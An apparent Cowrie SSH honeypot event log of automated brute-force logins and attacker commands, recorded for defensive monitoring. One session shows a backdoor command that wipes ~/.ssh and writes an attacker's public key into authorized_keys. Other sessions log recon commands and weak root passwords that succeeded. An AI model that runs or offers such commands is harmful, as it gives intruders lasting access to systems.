{"eventid":"cowrie.session.closed","duration":180.18540954589844,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:03.720515Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":483,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:03.733093Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.session.closed","duration":180.24166297912598,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:03.737048Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44820,"dst_ip":"1.2.3.4","dst_port":22,"session":"9849ec3fa22e","protocol":"ssh","message":"New connection: 217.154.1.158:44820 (1.2.3.4:22) [session: 9849ec3fa22e]","sensor":"my-vps","timestamp":"2025-08-26T20:02:18.969963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:02:18.970742Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:02:18.985186Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:02:19.030234Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:02:19.079376Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:02:19.080227Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:19.096077Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:19.097210Z","src_ip":"217.154.1.158","session":"9849ec3fa22e"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37956,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9658242fa95","protocol":"ssh","message":"New connection: 217.154.1.158:37956 (1.2.3.4:22) [session: c9658242fa95]","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.469512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.470489Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.484331Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.528799Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:02:36.620581Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.621259Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.635694Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:36.636599Z","src_ip":"217.154.1.158","session":"c9658242fa95"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":41994,"dst_ip":"1.2.3.4","dst_port":22,"session":"d815bb3e7c47","protocol":"ssh","message":"New connection: 199.195.248.191:41994 (1.2.3.4:22) [session: d815bb3e7c47]","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.279323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.280599Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.374302Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.login.success","username":"root","password":"sebas123","message":"login attempt [root/sebas123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.724374Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:02:39.975024Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.975928Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:02:39.976795Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.071985Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:02:40.273741Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.274421Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.377718Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.378642Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":42536,"dst_ip":"1.2.3.4","dst_port":22,"session":"6018e59a7f2d","protocol":"ssh","message":"New connection: 199.195.248.191:42536 (1.2.3.4:22) [session: 6018e59a7f2d]","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.463291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.476831Z","src_ip":"199.195.248.191","session":"6018e59a7f2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.562457Z","src_ip":"199.195.248.191","session":"6018e59a7f2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:02:40.919826Z","src_ip":"199.195.248.191","session":"6018e59a7f2d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.019997Z","src_ip":"199.195.248.191","session":"6018e59a7f2d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":43166,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7e807b77138","protocol":"ssh","message":"New connection: 199.195.248.191:43166 (1.2.3.4:22) [session: a7e807b77138]","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.104716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.117826Z","src_ip":"199.195.248.191","session":"a7e807b77138"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.203086Z","src_ip":"199.195.248.191","session":"a7e807b77138"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.569173Z","src_ip":"199.195.248.191","session":"a7e807b77138"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.661402Z","src_ip":"199.195.248.191","session":"d815bb3e7c47"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:42.662480Z","src_ip":"199.195.248.191","session":"a7e807b77138"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49234,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f209747eb1e","protocol":"ssh","message":"New connection: 217.154.1.158:49234 (1.2.3.4:22) [session: 2f209747eb1e]","sensor":"my-vps","timestamp":"2025-08-26T20:02:54.003964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:02:54.005631Z","src_ip":"217.154.1.158","session":"2f209747eb1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:02:54.019746Z","src_ip":"217.154.1.158","session":"2f209747eb1e"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:02:54.063973Z","src_ip":"217.154.1.158","session":"2f209747eb1e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:55.079854Z","src_ip":"217.154.1.158","session":"2f209747eb1e"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":57370,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb293d6b3816","protocol":"ssh","message":"New connection: 45.88.8.215:57370 (1.2.3.4:22) [session: eb293d6b3816]","sensor":"my-vps","timestamp":"2025-08-26T20:02:59.995459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:03:00.211519Z","src_ip":"45.88.8.215","session":"eb293d6b3816"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:03:00.212523Z","src_ip":"45.88.8.215","session":"eb293d6b3816"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishit@123","message":"login attempt [root/Nishit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:03:01.495938Z","src_ip":"45.88.8.215","session":"eb293d6b3816"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:02.580364Z","src_ip":"45.88.8.215","session":"eb293d6b3816"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56260,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ac16c9cdb3","protocol":"ssh","message":"New connection: 217.154.1.158:56260 (1.2.3.4:22) [session: 88ac16c9cdb3]","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.521315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.522247Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01